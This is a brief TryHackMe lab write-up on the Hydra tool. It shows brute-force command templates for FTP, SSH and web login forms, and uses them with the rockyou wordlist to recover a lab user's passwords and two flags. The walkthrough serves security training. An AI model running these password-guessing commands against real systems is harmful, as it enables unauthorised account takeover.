Hydra - TryHackMe

Hydra from TryHackMe

Task 1 - Hydra Introduction

uses and installation

Task 2 - Using Hydra

• ftp bruteforcing : hydra -l user -P passlist.txt ftp://$MACHINE_IP

• ssh bruteforcing : hydra -l <username> -P <full path to pass> $MACHINE_IP -t 4 ssh

• POST web form : hydra -l <username> -P <wordlist> $MACHINE_IP http-post-form "/<loginURL>:username=^USER^&password=^PASS^:F=incorrect" -V

for the wordlists, i used rockyou.txt. in kali, it is present in /usr/share/wordlists/rockyou.txt.gz.

1. Use Hydra to bruteforce molly’s web password. What is flag 1?

   it is given that the username is molly. therefore, the hydra command would be hydra -l molly -P /usr/share/wordlists/rockyou.txt.gz $MACHINE_IP http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

   

   the flag then appears with some disney background idk xD

   

2. Use Hydra to bruteforce molly’s SSH password. What is flag 2?

   continuing, the hydra command would be hydra -l molly -P /usr/share/wordlists/rockyou.txt.gz $MACHINE_IP -t 4 ssh

   then after ssh-ing into molly’s system using the password, the flag is present in flag2.txt right in the home directory

   

real nice room.